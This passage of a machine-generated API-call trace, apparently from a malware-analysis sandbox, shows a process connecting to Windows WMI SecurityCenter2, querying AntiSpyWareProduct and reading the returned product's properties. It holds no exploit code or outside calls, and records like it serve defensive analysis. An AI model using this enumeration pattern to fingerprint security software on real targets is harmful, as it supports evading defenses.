CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0235.643] CoGetContextToken (in: pToken=0x38edac | out: pToken=0x38edac) returned 0x0 [0235.643] WbemLocator:IUnknown:QueryInterface (in: This=0x5642a30, riid=0x38ee7c*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ee78 | out: ppvObject=0x38ee78*=0x5642a30) returned 0x0 [0235.643] WbemLocator:IUnknown:AddRef (This=0x5642a30) returned 0x3 [0235.643] WbemLocator:IUnknown:Release (This=0x5642a30) returned 0x2 [0235.643] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f008 | out: puCount=0x38f008*=0x2) returned 0x0 [0235.643] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=8, puBuffLength=0x38f004*=0x0, pszText=0x0 | out: puBuffLength=0x38f004*=0x19, pszText=0x0) returned 0x0 [0235.643] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=8, puBuffLength=0x38f004*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f004*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0235.643] CoCreateInstance (in: rclsid=0x6d5f3734*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x6d5f3794*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x38eea0 | out: ppv=0x38eea0*=0x5642a10) returned 0x0 [0235.643] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5642a10, strNetworkResource="\\\\.\\ROOT\\SecurityCenter2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x38ef54 | out: ppNamespace=0x38ef54*=0x563fc28) returned 0x0 [0235.985] WbemLocator:IUnknown:QueryInterface (in: This=0x563fc28, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edc4 | out: ppvObject=0x38edc4*=0x55c561c) returned 0x0 [0235.985] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x55c561c, pProxy=0x563fc28, pAuthnSvc=0x38ee14, pAuthzSvc=0x38ee10, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c, pImpLevel=0x38edfc, pAuthInfo=0x38ee00, pCapabilites=0x38ee04 | out: pAuthnSvc=0x38ee14*=0xa, pAuthzSvc=0x38ee10*=0x0, pServerPrincName=0x38ee08, pAuthnLevel=0x38ee0c*=0x6, pImpLevel=0x38edfc*=0x2, pAuthInfo=0x38ee00, pCapabilites=0x38ee04*=0x1) returned 0x0 [0235.985] WbemLocator:IUnknown:Release (This=0x55c561c) returned 0x1 [0235.985] WbemLocator:IUnknown:QueryInterface (in: This=0x563fc28, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38edb8 | out: ppvObject=0x38edb8*=0x55c563c) returned 0x0 [0235.985] WbemLocator:IUnknown:QueryInterface (in: This=0x563fc28, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38eda4 | out: ppvObject=0x38eda4*=0x55c561c) returned 0x0 [0235.986] WbemLocator:IClientSecurity:SetBlanket (This=0x55c561c, pProxy=0x563fc28, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0235.986] WbemLocator:IUnknown:Release (This=0x55c561c) returned 0x2 [0235.986] WbemLocator:IUnknown:Release (This=0x55c563c) returned 0x1 [0235.986] CoTaskMemFree (pv=0x55fed98) [0235.986] WbemLocator:IUnknown:AddRef (This=0x563fc28) returned 0x2 [0235.986] WbemLocator:IUnknown:Release (This=0x5642a10) returned 0x0 [0235.987] CoGetContextToken (in: pToken=0x38e2f8 | out: pToken=0x38e2f8) returned 0x0 [0235.987] CoGetContextToken (in: pToken=0x38e70c | out: pToken=0x38e70c) returned 0x0 [0235.987] WbemLocator:IUnknown:QueryInterface (in: This=0x563fc28, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6a4 | out: ppvObject=0x38e6a4*=0x55c5624) returned 0x0 [0235.987] WbemLocator:IRpcOptions:Query (in: This=0x55c5624, pPrx=0x563ad58, dwProperty=2, pdwValue=0x38e798 | out: pdwValue=0x38e798) returned 0x80004002 [0235.988] WbemLocator:IUnknown:Release (This=0x55c5624) returned 0x2 [0235.988] CoGetContextToken (in: pToken=0x38ecdc | out: pToken=0x38ecdc) returned 0x0 [0235.988] CoGetContextToken (in: pToken=0x38ec3c | out: pToken=0x38ec3c) returned 0x0 [0235.988] WbemLocator:IUnknown:QueryInterface (in: This=0x563fc28, riid=0x38ed0c*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x38ebd8 | out: ppvObject=0x38ebd8*=0x563fc28) returned 0x0 [0235.988] WbemLocator:IUnknown:Release (This=0x563fc28) returned 0x2 [0235.988] SysStringLen (param_1=0x0) returned 0x0 [0235.989] CoGetContextToken (in: pToken=0x38ee0c | out: pToken=0x38ee0c) returned 0x0 [0235.989] IWbemServices:ExecQuery (in: This=0x563fc28, strQueryLanguage="WQL", strQuery="SELECT * FROM AntiSpyWareProduct", lFlags=16, pCtx=0x0, ppEnum=0x38f014 | out: ppEnum=0x38f014*=0x544efd0) returned 0x0 [0236.058] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee6c | out: ppvObject=0x38ee6c*=0x544efd4) returned 0x0 [0236.058] IClientSecurity:QueryBlanket (in: This=0x544efd4, pProxy=0x544efd0, pAuthnSvc=0x38eebc, pAuthzSvc=0x38eeb8, pServerPrincName=0x38eeb0, pAuthnLevel=0x38eeb4, pImpLevel=0x38eea4, pAuthInfo=0x38eea8, pCapabilites=0x38eeac | out: pAuthnSvc=0x38eebc*=0xa, pAuthzSvc=0x38eeb8*=0x0, pServerPrincName=0x38eeb0, pAuthnLevel=0x38eeb4*=0x6, pImpLevel=0x38eea4*=0x2, pAuthInfo=0x38eea8, pCapabilites=0x38eeac*=0x1) returned 0x0 [0236.058] IUnknown:Release (This=0x544efd4) returned 0x1 [0236.058] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee60 | out: ppvObject=0x38ee60*=0x55c4bec) returned 0x0 [0236.058] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ee4c | out: ppvObject=0x38ee4c*=0x544efd4) returned 0x0 [0236.058] IClientSecurity:SetBlanket (This=0x544efd4, pProxy=0x544efd0, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0236.061] IUnknown:Release (This=0x544efd4) returned 0x2 [0236.061] WbemLocator:IUnknown:Release (This=0x55c4bec) returned 0x1 [0236.061] CoTaskMemFree (pv=0x55fec78) [0236.061] IUnknown:AddRef (This=0x544efd0) returned 0x2 [0236.062] CoGetContextToken (in: pToken=0x38e38c | out: pToken=0x38e38c) returned 0x0 [0236.062] CoGetContextToken (in: pToken=0x38e79c | out: pToken=0x38e79c) returned 0x0 [0236.062] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e738 | out: ppvObject=0x38e738*=0x55c4bd4) returned 0x0 [0236.062] WbemLocator:IRpcOptions:Query (in: This=0x55c4bd4, pPrx=0x563ada0, dwProperty=2, pdwValue=0x38e82c | out: pdwValue=0x38e82c) returned 0x80004002 [0236.063] WbemLocator:IUnknown:Release (This=0x55c4bd4) returned 0x2 [0236.063] CoGetContextToken (in: pToken=0x38ed6c | out: pToken=0x38ed6c) returned 0x0 [0236.063] CoGetContextToken (in: pToken=0x38eccc | out: pToken=0x38eccc) returned 0x0 [0236.063] IUnknown:QueryInterface (in: This=0x544efd0, riid=0x38ed9c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ec68 | out: ppvObject=0x38ec68*=0x544efd0) returned 0x0 [0236.063] IUnknown:Release (This=0x544efd0) returned 0x2 [0236.063] SysStringLen (param_1=0x0) returned 0x0 [0236.064] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f060 | out: puCount=0x38f060*=0x2) returned 0x0 [0236.064] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f05c*=0x0, pszText=0x0 | out: puBuffLength=0x38f05c*=0x19, pszText=0x0) returned 0x0 [0236.064] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f05c*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f05c*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.064] CoGetContextToken (in: pToken=0x38eeb4 | out: pToken=0x38eeb4) returned 0x0 [0236.064] IEnumWbemClassObject:Clone (in: This=0x544efd0, ppEnum=0x38f06c | out: ppEnum=0x38f06c*=0x544f098) returned 0x0 [0236.066] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef28 | out: ppvObject=0x38ef28*=0x544f09c) returned 0x0 [0236.066] IClientSecurity:QueryBlanket (in: This=0x544f09c, pProxy=0x544f098, pAuthnSvc=0x38ef78, pAuthzSvc=0x38ef74, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70, pImpLevel=0x38ef60, pAuthInfo=0x38ef64, pCapabilites=0x38ef68 | out: pAuthnSvc=0x38ef78*=0xa, pAuthzSvc=0x38ef74*=0x0, pServerPrincName=0x38ef6c, pAuthnLevel=0x38ef70*=0x6, pImpLevel=0x38ef60*=0x2, pAuthInfo=0x38ef64, pCapabilites=0x38ef68*=0x1) returned 0x0 [0236.066] IUnknown:Release (This=0x544f09c) returned 0x1 [0236.066] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35a4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef1c | out: ppvObject=0x38ef1c*=0x55c581c) returned 0x0 [0236.066] IUnknown:QueryInterface (in: This=0x544f098, riid=0x6d5f35b4*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ef08 | out: ppvObject=0x38ef08*=0x544f09c) returned 0x0 [0236.066] IClientSecurity:SetBlanket (This=0x544f09c, pProxy=0x544f098, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0236.068] IUnknown:Release (This=0x544f09c) returned 0x2 [0236.068] WbemLocator:IUnknown:Release (This=0x55c581c) returned 0x1 [0236.068] CoTaskMemFree (pv=0x55fedc8) [0236.068] IUnknown:AddRef (This=0x544f098) returned 0x2 [0236.069] CoGetContextToken (in: pToken=0x38e438 | out: pToken=0x38e438) returned 0x0 [0236.069] CoGetContextToken (in: pToken=0x38e84c | out: pToken=0x38e84c) returned 0x0 [0236.069] IUnknown:QueryInterface (in: This=0x544f098, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e7e4 | out: ppvObject=0x38e7e4*=0x55c5804) returned 0x0 [0236.069] WbemLocator:IRpcOptions:Query (in: This=0x55c5804, pPrx=0x563ae30, dwProperty=2, pdwValue=0x38e8d8 | out: pdwValue=0x38e8d8) returned 0x80004002 [0236.069] WbemLocator:IUnknown:Release (This=0x55c5804) returned 0x2 [0236.069] CoGetContextToken (in: pToken=0x38ee1c | out: pToken=0x38ee1c) returned 0x0 [0236.069] CoGetContextToken (in: pToken=0x38ed7c | out: pToken=0x38ed7c) returned 0x0 [0236.069] IUnknown:QueryInterface (in: This=0x544f098, riid=0x38ee4c*(Data1=0x27947e1, Data2=0xd731, Data3=0x11ce, Data4=([0]=0xa3, [1]=0x57, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x1)), ppvObject=0x38ed18 | out: ppvObject=0x38ed18*=0x544f098) returned 0x0 [0236.069] IUnknown:Release (This=0x544f098) returned 0x2 [0236.069] SysStringLen (param_1=0x0) returned 0x0 [0236.070] IEnumWbemClassObject:Reset (This=0x544f098) returned 0x0 [0236.071] CoTaskMemAlloc (cb=0x4) returned 0x5642aa0 [0236.071] IEnumWbemClassObject:Next (in: This=0x544f098, lTimeout=-1, uCount=0x1, apObjects=0x5642aa0, puReturned=0x266ebd0 | out: apObjects=0x5642aa0*=0x560db08, puReturned=0x266ebd0*=0x1) returned 0x0 [0236.072] IUnknown:QueryInterface (in: This=0x560db08, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e6c4 | out: ppvObject=0x38e6c4*=0x560db08) returned 0x0 [0236.072] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e678 | out: ppvObject=0x38e678*=0x0) returned 0x80004002 [0236.072] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1e84*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38e4a0 | out: ppvObject=0x38e4a0*=0x0) returned 0x80004002 [0236.073] IUnknown:AddRef (This=0x560db08) returned 0x3 [0236.073] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38dfd4 | out: ppvObject=0x38dfd4*=0x0) returned 0x80004002 [0236.073] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38df84 | out: ppvObject=0x38df84*=0x0) returned 0x80004002 [0236.073] IUnknown:QueryInterface (in: This=0x560db08, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38df90 | out: ppvObject=0x38df90*=0x560db0c) returned 0x0 [0236.073] IMarshal:GetUnmarshalClass (in: This=0x560db0c, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38df98 | out: pCid=0x38df98*(Data1=0x4590f812, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24))) returned 0x0 [0236.073] IUnknown:Release (This=0x560db0c) returned 0x3 [0236.073] CoGetContextToken (in: pToken=0x38dff0 | out: pToken=0x38dff0) returned 0x0 [0236.073] CoGetContextToken (in: pToken=0x38e404 | out: pToken=0x38e404) returned 0x0 [0236.073] IUnknown:QueryInterface (in: This=0x560db08, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e484 | out: ppvObject=0x38e484*=0x0) returned 0x80004002 [0236.073] IUnknown:Release (This=0x560db08) returned 0x2 [0236.073] CoGetContextToken (in: pToken=0x38e9ec | out: pToken=0x38e9ec) returned 0x0 [0236.073] CoGetContextToken (in: pToken=0x38e94c | out: pToken=0x38e94c) returned 0x0 [0236.073] IUnknown:QueryInterface (in: This=0x560db08, riid=0x38ea1c*(Data1=0xdc12a681, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x38ea18 | out: ppvObject=0x38ea18*=0x560db08) returned 0x0 [0236.073] IUnknown:AddRef (This=0x560db08) returned 0x4 [0236.073] IUnknown:Release (This=0x560db08) returned 0x3 [0236.073] IUnknown:Release (This=0x560db08) returned 0x2 [0236.074] CoTaskMemFree (pv=0x5642aa0) [0236.074] CoGetContextToken (in: pToken=0x38ed5c | out: pToken=0x38ed5c) returned 0x0 [0236.074] IUnknown:AddRef (This=0x560db08) returned 0x3 [0236.074] IWbemClassObject:Get (in: This=0x560db08, wszName="__GENUS", lFlags=0, pVal=0x38f05c*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f0dc*=0, plFlavor=0x38f0d8*=0 | out: pVal=0x38f05c*(varType=0x3, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x2, varVal2=0x0), pType=0x38f0dc*=3, plFlavor=0x38f0d8*=64) returned 0x0 [0236.074] IWbemClassObject:Get (in: This=0x560db08, wszName="__PATH", lFlags=0, pVal=0x38f040*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x38f0c4*=0, plFlavor=0x38f0c0*=0 | out: pVal=0x38f040*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"", varVal2=0x0), pType=0x38f0c4*=8, plFlavor=0x38f0c0*=64) returned 0x0 [0236.075] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xd4 [0236.075] SysStringByteLen (bstr="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0xd4 [0236.075] CoGetObjectContext (in: riid=0x25c02c4*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38f06c | out: ppv=0x38f06c*=0x6d0cac) returned 0x0 [0236.075] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6d0cac, pAptType=0x38f064 | out: pAptType=0x38f064*=1) returned 0x0 [0236.075] IUnknown:QueryInterface (in: This=0x6d0cac, riid=0x25c02ac*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x38f068 | out: ppvObject=0x38f068*=0x0) returned 0x80004002 [0236.075] IUnknown:Release (This=0x6d0cac) returned 0x1 [0236.077] CoGetClassObject (in: rclsid=0x55b3f5c*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x72656bd4*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x38e9d8 | out: ppv=0x38e9d8*=0x5642aa0) returned 0x0 [0236.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x5642aa0, riid=0x7261dd3c*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x38ebf0 | out: ppvObject=0x38ebf0*=0x0) returned 0x80004002 [0236.077] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5642aa0, pUnkOuter=0x0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38ebfc | out: ppvObject=0x38ebfc*=0x56445a8) returned 0x0 [0236.077] WbemDefPath:IUnknown:Release (This=0x5642aa0) returned 0x0 [0236.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e81c | out: ppvObject=0x38e81c*=0x56445a8) returned 0x0 [0236.077] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x725f1b6c*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x38e7d0 | out: ppvObject=0x38e7d0*=0x0) returned 0x80004002 [0236.078] WbemDefPath:IUnknown:AddRef (This=0x56445a8) returned 0x3 [0236.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x725f182c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x38e12c | out: ppvObject=0x38e12c*=0x0) returned 0x80004002 [0236.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x725f1764*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x38e0dc | out: ppvObject=0x38e0dc*=0x0) returned 0x80004002 [0236.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x72521388*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e0e8 | out: ppvObject=0x38e0e8*=0x5642ab0) returned 0x0 [0236.078] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x5642ab0, riid=0x72502a54*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x38e0f0 | out: pCid=0x38e0f0*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0236.078] WbemDefPath:IUnknown:Release (This=0x5642ab0) returned 0x3 [0236.078] CoGetContextToken (in: pToken=0x38e148 | out: pToken=0x38e148) returned 0x0 [0236.078] CoGetContextToken (in: pToken=0x38e55c | out: pToken=0x38e55c) returned 0x0 [0236.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x725f1aa8*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x38e5dc | out: ppvObject=0x38e5dc*=0x0) returned 0x80004002 [0236.078] WbemDefPath:IUnknown:Release (This=0x56445a8) returned 0x2 [0236.078] WbemDefPath:IUnknown:Release (This=0x56445a8) returned 0x1 [0236.078] CoGetContextToken (in: pToken=0x38eeec | out: pToken=0x38eeec) returned 0x0 [0236.078] CoGetContextToken (in: pToken=0x38ee4c | out: pToken=0x38ee4c) returned 0x0 [0236.078] WbemDefPath:IUnknown:QueryInterface (in: This=0x56445a8, riid=0x38ef1c*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x38ef18 | out: ppvObject=0x38ef18*=0x56445a8) returned 0x0 [0236.078] WbemDefPath:IUnknown:AddRef (This=0x56445a8) returned 0x3 [0236.079] WbemDefPath:IUnknown:Release (This=0x56445a8) returned 0x2 [0236.079] WbemDefPath:IWbemPath:SetText (This=0x56445a8, uMode=0x4, pszPath="\\\\Q9IATRKPRH\\ROOT\\SecurityCenter2:AntiSpywareProduct.instanceGuid=\"{D68DDC3A-831F-4fae-9E44-DA132C1ACF46}\"") returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f098 | out: puCount=0x38f098*=0x2) returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f094*=0x0, pszText=0x0 | out: puBuffLength=0x38f094*=0x19, pszText=0x0) returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f094*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f094*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5644538, puCount=0x38f064 | out: puCount=0x38f064*=0x2) returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f060*=0x0, pszText=0x0 | out: puBuffLength=0x38f060*=0x19, pszText=0x0) returned 0x0 [0236.079] WbemDefPath:IWbemPath:GetText (in: This=0x5644538, lFlags=4, puBuffLength=0x38f060*=0x19, pszText="000000000000000000000000" | out: puBuffLength=0x38f060*=0x19, pszText="\\\\.\\ROOT\\SecurityCenter2") returned 0x0 [0236.079] IWbemClassObject:Get (in: This=0x560db08, wszName="displayName", lFlags=0, pVal=0x38f060*(varType=0x0, 